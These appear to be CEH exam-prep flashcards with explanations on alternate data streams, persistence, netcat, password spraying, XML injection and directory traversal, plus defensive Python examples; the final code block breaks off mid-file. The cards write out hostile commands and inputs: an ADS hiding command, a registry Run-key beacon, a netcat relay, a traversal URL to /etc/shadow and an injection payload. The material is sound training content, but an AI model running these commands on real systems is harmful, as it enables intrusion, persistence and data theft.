CEH 41-80 Flashcards

1
Q

Christina is conducting a penetration test against Dion Training’s network. The goal of this engagement is to conduct data exfiltration of the company’s exam database without detection. Christina enters the following command into the terminal:

-=-=-=-=-=-=-
type C:\database\exams.db > c:\Users\Christina\Desktop\beachpic.png:exams.db
-=-=-=-=-=-=-

Next, Christina emailed the beachpic.png file to her personal email account. Which of the following techniques did she use to exfiltrate the file?

A. NTFS encryption
B. Alternate data streams
C. Unquoted service path
D. DLL hijacking

A

B. Alternate data streams

OBJ-3.2: An alternate data stream (ADS) is a feature of Microsoft's NT File System (NTFS) that lets a single file name carry more than one data stream. The unnamed (default) stream is what Explorer and most tools show; any number of named streams, here “exams.db”, can be attached to the same file without changing its visible size or content. ADS can be abused to hide one file inside another, as in this scenario: the type command reads the database and the redirect writes it into a named stream of beachpic.png, so the picture still opens normally. The hidden data can be read back with “more < beachpic.png:exams.db”, and a defender can list streams with “dir /R” or PowerShell “Get-Item beachpic.png -Stream *”. One caveat to the scenario as written: a named stream is NTFS metadata, so it is dropped when the file is copied to a non-NTFS volume, zipped with default settings, or sent as an email attachment. Only the picture itself would reach her mailbox, which is why ADS is primarily a local hiding technique and is usually paired with a transport that preserves the stream or with a separate exfiltration step.

2
Q

Which command-line tool could you use on a Windows system to enable an inactive administrator account?

A. taskkill

B. robocopy

C. net user

D. gpresult

A

C. net user

Explanation:

OBJ-3.2: The net family of commands is used to view and configure users, groups, and shared resources on a Windows system or network. The net user command manages local user accounts: run without arguments it lists the accounts, “net user administrator” displays the account's properties including whether it is active, and “net user administrator /active:yes” re-enables a disabled account (the command needs an elevated prompt). The built-in Administrator account is disabled by default on client versions of Windows, so this is the usual way to turn it on from the command line. taskkill ends running processes, robocopy copies files and directory trees, and gpresult reports the Group Policy settings applied to a computer or user.

3
Q

Which type of malware is used to actively attempt to steal confidential information by capturing a user’s data when typed into a web browser or other application?

A. Spyware

B. Keylogger

C. Trojan

D. Rootkit

A

B. Keylogger

Explanation
OBJ-3.3: A keylogger actively attempts to steal confidential information by capturing the data when entered into the computer by the user. This is done by recording keystrokes entered into a web browser or other application. A software keylogger can be run in the background on a victim’s computer. A hardware keylogger may be placed between the USB port and the wired keyboard.

4
Q

A cybersecurity analyst just finished conducting an initial vulnerability scan and is reviewing their results. To avoid wasting time on results that are not really a vulnerability, the analyst wants to remove any false positives before remediating the findings. Which of the following is an indicator that something in their results would be a false positive?

A. A finding that shows the scanner compliance plug-ins are not up-to-date

B. Items classified by the system as Low or as For Informational Purposes Only

C. A scan result showing a version that is different from the automated asset inventory

D. An HTTPS entry that indicates the web page is securely encrypted

A

B. Items classified by the system as Low or as For Informational Purposes Only

Explanation

OBJ-3.1: Of the four options, items the scanner classifies as “low” or “for informational purposes only” are the ones to review first for false positives. They carry the least evidence of an exploitable vulnerability (often a banner, a version string, or a best-practice note), so they are both the most likely to be wrong and the safest to set aside while higher-severity findings are remediated. They are not false positives by definition, however, so each should still be checked rather than silently ignored. An HTTPS entry stating that a page is encrypted is not a vulnerability at all; it is a true negative (a non-issue), not a false positive. A version that differs from the automated asset inventory should be investigated and is more likely a true positive, or a stale inventory. Out-of-date scanner compliance plug-ins are a real problem with the scan itself and must be fixed before the results can be trusted.

5
Q

You were interpreting a Nessus vulnerability scan report and identified a vulnerability in the system with a CVSS attack vector rating of A. Based on this information, which of the following statements would be true?

A. The attacker must have physical or logical access to the affected system

B. Exploiting the vulnerability requires the existence of specialized conditions

C. The attacker must have access to the local network that the system is connected to

D. Exploiting the vulnerability does not require any specialized conditions

A

A. The attacker must have physical or logical access to the affected system

Explanation

OBJ-3.1: In CVSS the Attack Vector (AV) metric describes the kind of access an attacker needs to the vulnerable component; it says nothing about specialized conditions, which are captured by the separate Attack Complexity metric. A rating of A means Adjacent: the attack must be launched from the same shared physical network (such as Bluetooth or a Wi-Fi network), the same logical network (such as a local subnet), or a limited administrative domain (such as a VPN or MPLS). Network (N) means the vulnerability is remotely exploitable across routed networks, and it scores higher than Adjacent because the pool of possible attackers is larger. Local (L) means the attacker needs local access to the system, for example at the keyboard or over an SSH session, or must rely on a user to run something. Physical (P) means the attacker must physically touch or manipulate the vulnerable component, as in a cold boot attack. Physical was added in CVSS v3; v2 had only Local, Adjacent Network, and Network.

6
Q

-=-=-=-=-=-=-
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v beacon /d C:\Windows\Temp\beacon.bat
-=-=-=-=-=-=-

Which of the following types of persistence is Matt trying to utilize?

A. Services

B. Scheduled task

C. Registry startup

D. PS remoting

A

C. Registry startup

Explanation

OBJ-3.2: The “reg add” command writes a value into the registry; here /v names the value (beacon) and /d supplies its data, the path of the script to run. Anything listed under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run is executed whenever any user logs on, while HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run runs only when that particular user logs on. The Run keys fire at logon rather than at boot, so the persistence survives a reboot only once someone signs in, and writing to the HKLM key requires administrative rights. Defenders can review the same keys with “reg query” or Sysinternals Autoruns, and Windows records the change as Event ID 4657 (registry value modified) when object auditing is enabled on the key.

7
Q

A vulnerability scan has returned the following results:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Detailed Results
10.56.17.21 (APACHE-2.4)
Windows Shares

Category: Windows 
CVE ID: - 
Vendor Ref: - 
Bugtraq ID: - 
Service Modified - 8.30.2017   
Enumeration Results: 
print$ c:\windows\system32\spool\drivers 
files c:\FileShare\Accounting   
Temp c:\temp
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What best describes the meaning of this output?

A. There is an unknown bug in an Apache server with no Bugtraq ID

B. Connecting to the host using a null session allows enumeration of the share names on the host

C. Windows Defender has a known exploit that must be resolved or patched

D. There is no CVE present, so this is a false positive caused by Apache running on a Windows server

A

B. Connecting to the host using a null session allows enumeration of the share names on the host
Explanation

OBJ-3.1: These results show an enumeration of SMB shares on the host 10.56.17.21 (the scanner labels it APACHE-2.4 because of its web server, but the finding concerns Windows file sharing). Three share names (print$, files, Temp) were returned over a null session, an anonymous SMB connection to the IPC$ share made with an empty user name and password, which older or misconfigured Windows hosts still permit. It can be reproduced with “net use \\10.56.17.21\ipc$ "" /u:""” from Windows or “smbclient -N -L //10.56.17.21” from Linux. There is no CVE because this is a configuration weakness rather than a software bug; not every vulnerability has a CVE, and the missing identifier does not make the finding a false positive. Nothing in the output mentions Windows Defender. Bugtraq IDs were a separate identifier issued by SecurityFocus, whose database is no longer maintained; a configuration issue like this having neither a CVE nor a Bugtraq ID is not suspicious. The remediation is to disallow anonymous enumeration (the “Network access: Do not allow anonymous enumeration of SAM accounts and shares” policy, RestrictAnonymous) and to review whether an accounting share needs to be reachable from the scanning network at all.

8
Q

What SCAP component provides a list of entries that contains an identification number, a description, and a public reference for each publicly known weakness in a piece of software?

A. XCCDF

B. CPE

C. CCE

D. CVE

A

D. CVE

Explanation
OBJ-3.1: The Common Vulnerabilities and Exposures (CVE) system provides a reference-method for publicly known information-security vulnerabilities and exposures. XCCDF (extensible configuration checklist description format) is a language that is used in creating checklists for reporting results. The Common Configuration Enumeration (CCE) provides unique identifiers to system configuration issues to facilitate fast and accurate correlation of configuration data across multiple information sources and tools. Common Platform Enumeration (CPE) is a standardized method of describing and identifying classes of applications, operating systems, and hardware devices present among an enterprise’s computing assets.

9
Q

You walked up behind a penetration tester in your organization and saw the following output on their Kali Linux terminal:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ATTEMPT] target 192.168.1.142 – login “root” – pass “abcde” 1 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “efghi” 2 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “12345” 3 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “67890” 4 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “a1b2c” 5 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “abcde” 6 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “efghi” 7 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “12345” 8 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “67890” 9 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “a1b2c” 10 of 10
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What type of test is the penetration tester currently conducting?

A. Conducting a port scan of 192.168.1.142

B. Conducting a brute force login attempt of a remote service on 192.168.1.142

C. Conducting a ping sweep of 192.168.1.142/24

D. Conducting a Denial of Service attack on 192.168.1.142

A

B. Conducting a brute force login attempt of a remote service on 192.168.1.142

Explanation
OBJ-3.2: The penetration tester is conducting a brute force login attempt against a remote service on 192.168.1.142: the output shows two user names (root and user) being tried in turn against the same short list of passwords. The lines are in the verbose output format of THC Hydra, which reports each guess as “[ATTEMPT] target … login … pass … n of N”; the format alone does not reveal which service (SSH, FTP, a web form, and so on) is being attacked. A brute force attack uses trial and error to guess a password or user name, find a hidden web page, or recover an encryption key. Port scanning identifies open ports and the services listening on a host. A denial-of-service (DoS) attack makes information systems, devices, or other network resources unavailable to legitimate users. A ping sweep is a basic network scanning technique that determines which addresses in a range belong to live hosts.

10
Q

Windows file servers commonly hold sensitive files, databases, passwords, and more. What common vulnerability is usually used against a Windows file server to expose sensitive files, databases, and passwords?

A. Cross-site scripting

B. SQL injection

C. Missing patches

D. CRLF injection

A

C. Missing patches

Explanation
OBJ-3.2: Missing patches are the most common vulnerability found on both Windows and Linux servers. Once a vendor releases a security patch, attackers reverse engineer it to work out the underlying vulnerability and build an exploit, so any server that has not applied the patch can be compromised and its data exposed. Cross-site scripting (XSS) is an injection attack in which malicious scripts are placed into otherwise benign and trusted websites; it targets the browsers of users visiting the site rather than the server itself. CRLF injection occurs when an attacker injects a carriage-return/line-feed sequence where the application does not expect one. SQL injection inserts malicious SQL through web page input and targets database-backed applications, not file servers.

11
Q

You have just finished running a vulnerability scan of the network and are reviewing the results. The first result in the report shows the following vulnerability:

You log into the MySQL server and verify that you are currently running version 3.5.3. Based on the item shown on the image, what best describes how you should categorize this finding?

A. True negative

B. True positive

C. False negative

D. False positive

A

D. False positive

Explanation
OBJ-3.1: You should categorize the result as a false positive. According to the scan item, the remote code execution vulnerability affects MySQL versions in the v3.3.x range and earlier, and the server is actually running v3.5.3, which is newer than the vulnerable range. The scanner therefore misidentified the MySQL version as an older, vulnerable one, most likely from a banner or fingerprint rather than an authenticated check. A reported vulnerability that does not exist on the system is a false positive, and verifying the version directly on the host, as done here, is the standard way to confirm that.

12
Q

After analyzing and correlating activity from the firewall logs, server logs, and the intrusion detection system logs, a cybersecurity analyst has determined that a sophisticated breach of the company’s network security may have occurred from a group of specialized attackers in a foreign country over the past five months. Up until now, these cyberattacks against the company network had gone unnoticed by the company’s information security team. How would you best classify this threat?

A. Advanced persistent threat (APT)

B. Spear phishing

C. Insider threat

D. Privilege escalation

A

A. Advanced persistent threat (APT)

Explanation
OBJ-3.3: An advanced persistent threat (APT) is an attack in which an unauthorized party gains access to a network and stays there undetected for a long period, usually to steal data rather than to cause damage. The term refers to an adversary's ongoing ability to compromise network security, obtain and maintain access, and use a variety of tools and techniques; such groups are often supported and funded by nation-states or work directly for a nation-state's government. Spear phishing is the fraudulent practice of sending emails ostensibly from a known or trusted sender to induce targeted individuals to reveal confidential information. An insider threat is a malicious threat to an organization from people within it, such as employees, former employees, contractors, or business associates, who have inside information about the organization's security practices, data, and systems. Privilege escalation is the exploitation of a bug, design flaw, or configuration oversight in an operating system or application to gain elevated access to resources that are normally protected. An APT may use spear phishing, privilege escalation, or an insider to gain access, but the scenario does not specify the method; the five-month undetected campaign by a specialized foreign group is what defines it, so APT is the best answer.

13
Q

A cybersecurity analyst is reviewing the logs of an authentication server and saw the following output:

-=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=-
[443] [https-get-form] host: diontraining.com login: admin password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: admin password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: diontraining.com login: root password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: root password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: diontraining.com login: dion password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: dion password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: diontraining.com login: jason password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: jason password: C0mpT1@P@$$w0rd
-=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=-

What type of attack was most likely being attempted by the attacker?

A. Credential stuffing

B. Session hijacking

C. Password spraying

D. Impersonation

A

C. Password spraying

Explanation
OBJ-3.2: Password spraying takes a list of user names and tries a single password against each of them in turn, then repeats with the next password; the number of passwords tried is small compared to the number of accounts. Spreading the attempts across accounts keeps the count against any one account below the lockout threshold, and it is often more effective at finding weak passwords than hammering a single user. In the log above only two attempts are made against each of the four user names, which is the spraying pattern rather than a brute force attack on one account. Note that this line format (“[443][https-get-form] host: … login: … password: …”) is also the one THC Hydra uses to report credentials it has found; if these lines came from the attack tool rather than from the server, every pair shown succeeded and all four accounts should be treated as compromised. Impersonation is pretending to be another person in order to commit fraud. Credential stuffing is the automated replay of breached user name/password pairs against other sites; it is a form of brute force in which large numbers of leaked credentials are tried until some match existing accounts, which the attacker can then take over. Session hijacking exploits a valid session, usually through a stolen session token, to gain unauthorized access to information or services.
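Both this card and card 9 turn on the ratio of distinct user names to distinct passwords in the attempts. The Python below (an added example, not from the flashcards or from Hydra) parses both line formats shown on these cards and labels the activity per target host. The spraying/brute-force rule and the lockout_threshold default of 5 are this example's assumptions, and the sample lines are copies of the two outputs above.

```python
import re
from collections import defaultdict

# Line formats from the two flashcards: THC Hydra's verbose "[ATTEMPT]" lines (card 9)
# and its "[port][module] host: ... login: ... password: ..." lines (card 13).
# Both straight and typographic quotes/dashes are accepted, since copied output varies.
ATTEMPT_RE = re.compile(
    r'\[ATTEMPT\]\s+target\s+(?P<host>\S+)\s+[-\u2013]\s+login\s+["\u201c](?P<user>[^"\u201d]*)["\u201d]'
    r'\s+[-\u2013]\s+pass\s+["\u201c](?P<password>[^"\u201d]*)["\u201d]'
)
MODULE_RE = re.compile(
    r'\[\d+\]\s*\[[^\]]+\]\s+host:\s+(?P<host>\S+)\s+login:\s+(?P<user>\S+)\s+password:\s+(?P<password>\S+)'
)


def parse_attempts(lines):
    """Yield (host, user, password) for each line in a recognised format."""
    for line in lines:
        m = ATTEMPT_RE.search(line) or MODULE_RE.search(line)
        if m:
            yield m.group("host"), m.group("user"), m.group("password")


def classify(lines, lockout_threshold=5):
    """Summarise guessing activity per target host.

    Heuristic used by this example (not a standard): more distinct users than
    distinct passwords is spraying, otherwise brute force. The worst-case number
    of attempts against any single account shows whether an account-lockout
    policy with the given threshold would have fired."""
    users = defaultdict(set)
    passwords = defaultdict(set)
    per_account = defaultdict(lambda: defaultdict(int))
    for host, user, password in parse_attempts(lines):
        users[host].add(user)
        passwords[host].add(password)
        per_account[host][user] += 1
    summary = {}
    for host in users:
        n_users, n_passwords = len(users[host]), len(passwords[host])
        worst = max(per_account[host].values())
        summary[host] = {
            "label": "password spraying" if n_users > n_passwords else "brute force",
            "users": n_users,
            "passwords": n_passwords,
            "max_attempts_per_account": worst,
            "would_trigger_lockout": worst >= lockout_threshold,
        }
    return summary


# Constructed copies of the outputs shown in cards 9 and 13.
HYDRA_ATTEMPTS = [
    '[ATTEMPT] target 192.168.1.142 - login "root" - pass "abcde" 1 of 10',
    '[ATTEMPT] target 192.168.1.142 - login "root" - pass "efghi" 2 of 10',
    '[ATTEMPT] target 192.168.1.142 - login "root" - pass "12345" 3 of 10',
    '[ATTEMPT] target 192.168.1.142 - login "root" - pass "67890" 4 of 10',
    '[ATTEMPT] target 192.168.1.142 - login "root" - pass "a1b2c" 5 of 10',
    '[ATTEMPT] target 192.168.1.142 - login "user" - pass "abcde" 6 of 10',
    '[ATTEMPT] target 192.168.1.142 - login "user" - pass "efghi" 7 of 10',
    '[ATTEMPT] target 192.168.1.142 - login "user" - pass "12345" 8 of 10',
    '[ATTEMPT] target 192.168.1.142 - login "user" - pass "67890" 9 of 10',
    '[ATTEMPT] target 192.168.1.142 - login "user" - pass "a1b2c" 10 of 10',
]
HYDRA_FORM_LOG = [
    "[443] [https-get-form] host: diontraining.com login: admin password: P@$$w0rd!",
    "[443] [https-get-form] host: diontraining.com login: admin password: C0mpT1@P@$$w0rd",
    "[443] [https-get-form] host: diontraining.com login: root password: P@$$w0rd!",
    "[443] [https-get-form] host: diontraining.com login: root password: C0mpT1@P@$$w0rd",
    "[443] [https-get-form] host: diontraining.com login: dion password: P@$$w0rd!",
    "[443] [https-get-form] host: diontraining.com login: dion password: C0mpT1@P@$$w0rd",
    "[443] [https-get-form] host: diontraining.com login: jason password: P@$$w0rd!",
    "[443] [https-get-form] host: diontraining.com login: jason password: C0mpT1@P@$$w0rd",
]

if __name__ == "__main__":
    for name, lines in (("card 9", HYDRA_ATTEMPTS), ("card 13", HYDRA_FORM_LOG)):
        for host, info in classify(lines).items():
            print(name, host, info)
```

Card 9 comes out as brute force with five attempts per account (enough to trip a five-strike lockout), card 13 as spraying with two attempts per account, which is exactly why spraying slips under lockout policies.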

14
Q

An attacker is searching in Google for Cisco VPN configuration files by using the filetype:pcf modifier. The attacker could locate several of these configuration files and now wants to decode any connectivity passwords that they might contain. What tool should the attacker use?

A. Nmap

B. Nessus

C. Cain and Abel

D. Netcat

A

C. Cain and Abel

Explanation
OBJ-3.2: Cain and Abel is a Windows password recovery tool. It can sniff credentials from the network and crack many kinds of password hashes using dictionary, brute force, and cryptanalysis (rainbow table) attacks, and it includes a Cisco VPN Client Password Decoder module for exactly this task: recovering the group password that a .pcf profile stores in obfuscated form in its enc_GroupPwd field. The tool has not been updated in years, but the decoding it performs is simple and other decoders exist. Nmap is a port scanner and network mapper, Nessus is a vulnerability scanner, and netcat is a general-purpose TCP/UDP utility used for banner grabbing, file transfer, and reverse shells; none of them decode passwords.
15
Q

An attacker has issued the following command: nc -l -p 8080 | nc 192.168.1.76 443. Based on this command, what will occur?

A. Netcat will listen on the 192.168.1.76 interface for 443 seconds on port 8080

B. Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443

C. Netcat will listen for a connection from 192.168.1.76 on port 443 and output anything received to port 8080

D. Netcat will listen on port 8080 and then output anything received to local interface 192.168.1.76

A

B. Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443

Explanation
OBJ-3.2: In the traditional netcat syntax, -l tells nc to listen and -p sets the listening port, so the first command waits for a connection on TCP port 8080. The | (pipe) connects the standard output of that listener to the standard input of the second nc, which connects out to 192.168.1.76 on port 443 and forwards whatever the listener received. The result is a one-way relay: data arriving on 8080 is pushed to 192.168.1.76:443, but replies from 192.168.1.76 go to the second command's stdout (the attacker's terminal), not back to the client on 8080; a two-way relay needs a named pipe (mkfifo) to feed the second nc's output back into the first. Using port 443 is a common way to blend in with outbound HTTPS and get past egress filtering, but netcat does not encrypt anything, so the relay is plaintext and visible to any sensor that inspects payloads rather than just port numbers. Some builds of the OpenBSD netcat shipped with Linux distributions reject -p together with -l and take the port positionally (nc -l 8080), so the exact form above is for the traditional or Windows build.

16
Q

You are currently working as a firewall technician. You have received a request to open a few ports on the firewall to allow a new VoIP system to operate properly. The installer has requested that the ports associated with SIP, RDP, H.323, and RTP be opened. Which of these protocols is NOT used by a typical VoIP system?

A. SIP

B. RDP

C. H.323

D. RTP

A

B. RDP

Explanation
OBJ-4.1: RDP (Remote Desktop Protocol) provides remote desktop access over TCP port 3389 and has nothing to do with VoIP, so it should not be opened for this system. SIP (Session Initiation Protocol, UDP/TCP 5060 and TLS 5061) sets up and tears down calls, H.323 (TCP 1720 for call signaling) is the older ITU voice and video conferencing suite, and RTP (Real-time Transport Protocol) carries the media itself over a negotiated range of UDP ports. All three are used heavily in VoIP and video conferencing deployments. When opening the RTP range, restrict the rule to the VoIP servers' addresses rather than the whole network.

17
Q

A network technician needs to monitor the network to find a user who is browsing websites against the company policy. What should the technician use to view the website and find the user browsing it?

A. SNMP GET

B. Top listener tool

C. Intrusion detection system

D. Packet sniffer

A

D. Packet sniffer

Explanation
OBJ-4.1: A packet sniffer (protocol analyzer) captures and decodes network traffic, so the technician can see which client IP requested which site and, for unencrypted HTTP, the full URLs, page contents, and sometimes credentials. For HTTPS traffic the capture shows only the destination host (from DNS lookups or the TLS Server Name Indication), not the page requested, so a web proxy or DNS log is often the more practical source. An intrusion detection system is different: it only logs traffic that matches its signatures or anomaly rules, so ordinary browsing to a policy-violating site will not be recorded unless a rule exists for it. SNMP GET retrieves management data such as interface counters, not browsing content, and a top listener tool only ranks hosts by traffic volume.

18
Q

A security analyst wants to implement a layered defense posture for the network, so he uses multiple antivirus defensive layers, including both end-user desktop antivirus software and an email gateway scanner. What kind of attack would this approach help to mitigate?

A. Forensic attack

B. ARP spoofing attack

C. Social engineering attack

D. Scanning attack

A

C. Social engineering attack

Explanation
OBJ-4.2: By utilizing both endpoint protection (desktop antivirus software) and the email gateway scanner, the security analyst works to prevent phishing and other social engineering attacks. Emails are a common attack vector used in social engineering attacks.

19
Q

A firewall administrator has configured a new DMZ to allow public systems to be segmented from the organization’s internal network. The firewall now has three security zones set: Untrusted (Internet) [143.27.43.0/24]; DMZ (DMZ) [161.212.71.0/24]; Trusted (Intranet) [10.10.0.0/24]. The firewall administrator has been asked to enable remote desktop access from a fixed IP on the remote network to a remote desktop server in the DMZ for the Chief Security Officer to work from his home office after hours. The CSO’s home internet uses a static IP of 143.27.43.32. The remote desktop server is assigned a public-facing IP of 161.212.71.14. What rule should the administrator add to the firewall?

A. Permit 143.27.43.0/24 161.212.71.0/24 RDP 3389

B. Permit 143.27.43.32 161.212.71.14 RDP 3389

C. Permit 143.27.43.32 161.212.71.0/24 RDP 3389

D. Permit 143.27.43.0/24 161.212.71.14 RDP 3389

A

B. Permit 143.27.43.32 161.212.71.14 RDP 3389

Explanation

OBJ-4.5: Because the requirement is to allow a single remote address through the firewall, the permit statement must name a single source IP in the Untrusted (Internet) zone; of the options given, only 143.27.43.32 fits. The destination is a single server in the DMZ, so only 161.212.71.14 fits. The destination port is 3389, the port for the Remote Desktop Protocol. Combining these three facts, only “permit 143.27.43.32 161.212.71.14 RDP 3389” is correct. The two rules with /24 networks would expose RDP to every host on the respective network, which violates least privilege. Even the correct rule exposes RDP to the Internet from one fixed address, and RDP reachable from the Internet is a frequent initial access vector, so multi-factor authentication on the server or a VPN in front of it is the usual additional control.

20
Q

A hacker successfully modified the sale price of items purchased through your company’s web site. During the investigation that followed, the security analyst has verified the web server, and the Oracle database was not compromised directly. The analyst also found no attacks that could have caused this during their log verification of the Intrusion Detection System (IDS). What is the most likely method that the attacker used to change the items’ sale price?

A. SQL injection

B. Changing hidden form values

C. Buffer overflow attack

D. Cross-site scripting

A

B. Changing hidden form values

Explanation
OBJ-5.2: Since there are no indications of an attack in the IDS logs, the database, or the server, the hacker most likely edited hidden form values to change the price the shopping cart submitted. Hidden fields are sent from the browser and can be altered by anyone with a proxy or the browser's developer tools, and a changed price looks like a normal request to every component on the server side. The fix is to look up prices and other trust-sensitive values from the catalogue on the server and never accept them from hidden fields, cookies, or query parameters that the client controls. A buffer overflow occurs when a program writes past a buffer's boundary and overwrites adjacent memory. Cross-site scripting (XSS) attacks are a type of injection in which malicious scripts are placed into otherwise benign and trusted websites; the attacker uses the web application to deliver browser-side script to other users. SQL injection is a code injection technique used against data-driven applications, in which malicious SQL statements are inserted into an entry field for execution, for example to dump the database contents to the attacker.

21
Q

You are analyzing the SIEM for your company’s e-commerce server when you notice the following URL in the logs of your SIEM:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
https://www.diontraining.com/add_to_cart.php?itemId=5"+perItemPrice="0.00"+quantity="100"+/> <item+id="5&quantity=0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this line, what type of attack do you expect has been attempted?

A. SQL injection

B. Buffer overflow

C. XML injection

D. Session hijacking

A

C. XML injection

Explanation
OBJ-5.2: This is an XML injection. The application builds an XML message for its cart or order service from the request parameters, and the itemId value contains XML syntax: a closing quote to terminate the id attribute, extra attributes (perItemPrice="0.00" quantity="100"), a /> to close the item element, and the start of a second item element (<item id="5) whose id attribute is completed by the server's own template, after which the legitimate quantity=0 parameter applies to that second element. The server therefore processes two items instead of one: 100 units of item 5 at a price of 0.00, and 0 units at the real price, which defeats the integrity of the add-to-cart function. The tell-tale sign is XML structure (quotes, attribute="value" pairs, and the /> and < characters) appearing inside a URL parameter that should hold a simple numeric ID; the fix is to validate the parameter's type and to build XML with a library that escapes attribute values rather than by string concatenation. A SQL injection occurs when user input is interpreted as a SQL command rather than as data by the back-end database. A buffer overflow writes past the end of a buffer into adjacent memory. A session hijacking attack exploits the web session control mechanism, normally a session token.
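The injection is easier to see with the server side in front of you. The Python below is an added example, not the site's code: build_cart_vulnerable and order_total stand in for a hypothetical add_to_cart.php and order service, CATALOGUE is a constructed price list (the real price of item 5 is not given on the card), and INJECTED_ITEM_ID is the itemId parameter from the URL above with the + signs decoded to spaces. The safe builder validates the parameter type and lets ElementTree do the escaping.

```python
import xml.etree.ElementTree as ET

# Constructed catalogue; the order service must price from here, not from the client.
CATALOGUE = {"5": 49.99}

# The itemId parameter from the logged URL, URL-decoded ('+' becomes a space).
INJECTED_ITEM_ID = '5" perItemPrice="0.00" quantity="100" /> <item id="5'


def build_cart_vulnerable(item_id, quantity):
    """Hypothetical add_to_cart.php: request parameters are pasted into the XML
    message for the order service without validation or escaping."""
    return '<cart><item id="%s" quantity="%s" /></cart>' % (item_id, quantity)


def is_valid_request(item_id, quantity):
    """Type and range checks a numeric ID and quantity should pass."""
    return (item_id.isdigit() and item_id in CATALOGUE
            and quantity.isdigit() and int(quantity) >= 1)


def build_cart_safe(item_id, quantity):
    """Validate first, then let ElementTree serialise so every attribute value is
    escaped; a quote in item_id can no longer terminate the attribute."""
    if not is_valid_request(item_id, quantity):
        raise ValueError("invalid item id or quantity")
    cart = ET.Element("cart")
    ET.SubElement(cart, "item", {"id": item_id, "quantity": str(int(quantity))})
    return ET.tostring(cart, encoding="unicode")


def escape_only(item_id, quantity):
    """Escaping without validation: the payload survives as one literal id value
    and the document still has exactly one item."""
    cart = ET.Element("cart")
    ET.SubElement(cart, "item", {"id": item_id, "quantity": str(quantity)})
    return ET.tostring(cart, encoding="unicode")


def parse_items(cart_xml):
    """Attribute dicts of the <item> elements the order service would see."""
    return [dict(item.attrib) for item in ET.fromstring(cart_xml).findall("item")]


def order_total(cart_xml):
    """Hypothetical order service: honours a perItemPrice attribute if present
    (assumed to exist for internal callers; that trust is what the injection
    abuses) and otherwise prices from the catalogue. Returns (item_count, total)."""
    items = parse_items(cart_xml)
    total = 0.0
    for item in items:
        price = item.get("perItemPrice")
        unit = float(price) if price is not None else CATALOGUE[item["id"]]
        total += unit * int(item["quantity"])
    return len(items), round(total, 2)


if __name__ == "__main__":
    attacked = build_cart_vulnerable(INJECTED_ITEM_ID, "0")
    print(attacked)
    print("items, total:", order_total(attacked))          # two items, total 0.00
    print("items, total:", order_total(build_cart_vulnerable("5", "1")))
    print(escape_only(INJECTED_ITEM_ID, 0))                # one item, id is the literal payload
    print("valid?", is_valid_request(INJECTED_ITEM_ID, "0"))
```

Escaping alone turns the payload into a harmless but nonsensical id that the catalogue lookup will reject; validating the type before building the document is what keeps such input out of the message entirely.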

22
Q

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/../../../../etc/shadow. What type of attack has likely occurred?

A. SQL injection

B. Buffer overflow

C. Directory traversal

D. XML injection

A

C. Directory traversal

Explanation
OBJ-5.2: This is an example of a directory traversal. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with “dot-dot-slash (../)” sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic. SQL injection is the placement of malicious code in SQL statements via web page input.
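A web server or proxy defends against this by resolving the request path and refusing anything that lands outside the document root. The Python below is an added example, not from the card or from any particular server: resolve_under_root decodes percent-encoding, normalizes the path, and checks the prefix, and traversal_attempts flags such URLs in proxy log lines. WEBROOT and the PROXY_LOG lines are constructed; the first logged URL is the one from the card.

```python
import posixpath
from urllib.parse import unquote, urlsplit

WEBROOT = "/var/www/html"  # assumed document root for the example


def decode_path(url_path, rounds=2):
    """URL-decode a path; a second round catches double encoding such as %252e."""
    path = url_path
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")  # treat Windows separators as slashes


def resolve_under_root(webroot, url_path):
    """Map a request path onto the filesystem, or return None if the normalized
    result would lie outside webroot."""
    path = decode_path(url_path)
    if "\x00" in path:  # NUL-byte truncation tricks are never legitimate
        return None
    root = posixpath.normpath(webroot)
    full = posixpath.normpath(posixpath.join(root, path.lstrip("/")))
    if full != root and not full.startswith(root + "/"):
        return None
    return full


def traversal_attempts(log_lines):
    """Return the URLs in proxy log lines whose decoded path contains a '..' segment."""
    hits = []
    for line in log_lines:
        for token in line.split():
            if token.startswith(("http://", "https://")):
                segments = decode_path(urlsplit(token).path).split("/")
                if ".." in segments:
                    hits.append(token)
    return hits


# Constructed proxy log lines; the first URL is the one from the card.
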